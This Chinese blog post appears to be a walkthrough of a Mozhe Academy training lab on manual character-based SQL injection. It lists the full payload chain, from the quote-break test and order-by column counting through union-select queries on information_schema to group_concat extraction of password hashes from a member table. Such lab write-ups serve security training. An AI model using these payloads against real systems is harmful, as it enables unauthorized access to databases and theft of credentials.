您的位置: 首页  >  文章  >  墨者学院SQL手动注入(字符型)

墨者学院SQL手动注入(字符型)

分类: 文章 2024-06-13 20:00:10

点开环境后,点击这里:墨者学院SQL手动注入(字符型)
会出现:墨者学院SQL手动注入(字符型)
从题目或者从网址看到只是一个字符型的注入。首先,我们要判断是否存在判断点
加 ’ and 1=1%23正常.(%23就相当于#,但用#的话结束不了所以就用%23)
墨者学院SQL手动注入(字符型)
存在注入点,然后判断字段数:
判断字段数。order by 5%23报错
墨者学院SQL手动注入(字符型)order by 4%23,没事:
墨者学院SQL手动注入(字符型)输入:id=1’ union select 1,2,3,4%23
墨者学院SQL手动注入(字符型)

输入:union select 1,database(),user(),4%23
墨者学院SQL手动注入(字符型)
输入:union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()%23
墨者学院SQL手动注入(字符型)再输入:union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘stormgroup_member’%23
墨者学院SQL手动注入(字符型)再输入:union select 1,(select group_concat(password) from stormgroup_member),3,4%23

墨者学院SQL手动注入(字符型)密码是md5**,所以密文是32位。逗号两边分别为单独的用户名,密码。
墨者学院SQL手动注入(字符型)再把密码用户名输入,找到key。

相关推荐